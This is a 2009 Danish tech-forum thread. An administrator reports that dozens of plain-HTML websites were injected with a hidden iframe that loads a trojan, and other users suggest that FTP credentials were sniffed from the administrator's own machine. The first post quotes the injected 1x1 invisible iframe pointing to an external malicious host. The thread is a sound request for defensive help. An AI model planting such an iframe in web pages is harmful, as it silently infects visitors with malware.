Avatar billede javaspasser Nybegynder
16. februar 2009 - 22:03 Der er 7 kommentarer og
1 løsning

Er vist udsat for Hacking (cross site scripting)?

Hej med Jer,

Jeg har i dag været udsat for, at en masse hjemmesider som jeg administrerer, har været udsat for hacking.

Jeg administrerer omkring 50 sider og på alle disse er der lagt en <iframe> ind som det sidste i <body>-tagget, som dirigerer videre til en side med en trojansk hest :(

Eksempel fra en af siderne:

<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0"><iframe src="http://bestlotron.cn/in.cgi?cocacola59" width=1
> height=1 style="visibility: hidden"></iframe>

KLIK IKKE PÅ LINKET!!

Hvordan kan dette gå til?

Back-up'en af de forskellige sites på min computer fejler ikke noget.

Jeg bruger FTP programmet WS_FTP Pro V. 8.0, og har noteret at det stort set er alle de forskellige sider, som der er forudinstillet koder for i dette program, som er blevet inficeret! Kan det være noget med FTP-programmet?

Har 3 andre sites som ikke er indkodet til automatisk log-on via WS_FTP Pro, og disse er der ikke sket noget med.

De forskellige sites ligger hos 3 forskellige udbydere, og de svarer alle, at der ikke er noget problem hos dem, men at det er kunden der skal have sin software opdateret....hvad så end det betyder?

Jeg er virkelig nervøs for at blive udsat for dette igen og har læst et andet sted, at når først hackeren har fundet ind en gang, så kan jeg forvente at det vil ske jævnligt fremover.

En anden bruger herinde har været udsat for det samme:
http://www.eksperten.dk/spm/841964

Hvad kan man gøre for at løse dette problem? Nogen gode råd?

Ydermere kan jeg nævne at alle de websider jeg administrerer kun indeholder ganske alm. HTML-kodning. Så ingen websites med store koder og databaser.

Jeg har tjecket min PC for virus/trojanere med AVG og den skulle være ren.

Håber at der sidder et klogt hoved herinde :)

De bedste hilsner

Line
Avatar billede bufferzone Praktikant
16. februar 2009 - 23:33 #1
Uden at have kontrolleret vil jeg påstå at det mest sansynelige er at du anvender det samme CMS system på alle dine sites. Det at du bruger WS_ftp til at tilgå dine sites, kan en hacker ikke bruge til noget da han hacker web serveren og ikke din klient.

Det er dog muligt at det er din egen maskine som du administrere fra der er komrpomitteret, og at man har sniffet din ftp password som du bruger til at administrere dine sites med.

Fortæl mig om dine sites alle anvender det samme CMS system, samme logon system eller der er andet der går i gen for alle de sites du anvender.
Avatar billede javaspasser Nybegynder
16. februar 2009 - 23:40 #2
Hey Buffer :)

Der er ikke CMS-system på nogen af de sites jeg har lavet. Kun HMTL....da jeg ikke er den store kode-person.

De er alle programmeret i Dreamweaver 6.0. Men det burde jo ikke have nogen betydning?

Koden er helt "ren" og det eneste Dreamweaver indsætter inde opstart der dette:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Untitled Document</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body>

</body>
</html>

____________________

Line
Avatar billede javaspasser Nybegynder
17. februar 2009 - 00:06 #3
I øvrigt har hvert site sin egen ftp-adgang. Altså med hver sine koder.

Det er sgu muligvis nok min maskine der er blevet afluret??
Avatar billede javaspasser Nybegynder
17. februar 2009 - 00:06 #4
I øvrigt har hvert site sin egen ftp-adgang. Altså med hver sine koder.

Det er sgu muligvis nok min maskine der er blevet afluret??
Avatar billede bufferzone Praktikant
17. februar 2009 - 00:32 #5
Det kunne tyde på det. Du bør få en at ekspertens spy/malware eksperter til at kigge på maskinen for som munimum at få det be eller afkræftet.

FPT passwords kan sniffes ret let da de er ukrypterede, så har din maskine noget skidt liggende, så er den slags let at skaffe
Avatar billede javaspasser Nybegynder
17. februar 2009 - 22:17 #6
Ja...det ville nok være en idé :)

Har nu ændret alle passwords og fjernet dem fra systemet, da sider blev hacket påny i dag. Og det ser ud til at funge :)

Du siger; Se på maskinen? Mener dog med en log fra HiJackThis eller noget i den retning?

Line
Avatar billede bufferzone Praktikant
17. februar 2009 - 23:53 #7
Jeg mener den maskine hvorfra du administrere dine web sites og jeg mener hijackthis og alle de teknikker som disse spyware folk er så gode til.

Jeg har slet ikke beskæftiget mig med den slags, fordi det er der allerede folk der kan så jeg koncentrere mig andre steder
Avatar billede javaspasser Nybegynder
18. februar 2009 - 12:34 #8
Tak for dine svar...jeg smider lige nogle point til dig :)
Avatar billede Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Loading billede Opret Preview
Kategori
IT-kurser om Microsoft 365, sikkerhed, personlig vækst, udvikling, digital markedsføring, grafisk design, SAP og forretningsanalyse.

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Du kan også logge ind via nedenstående tjenester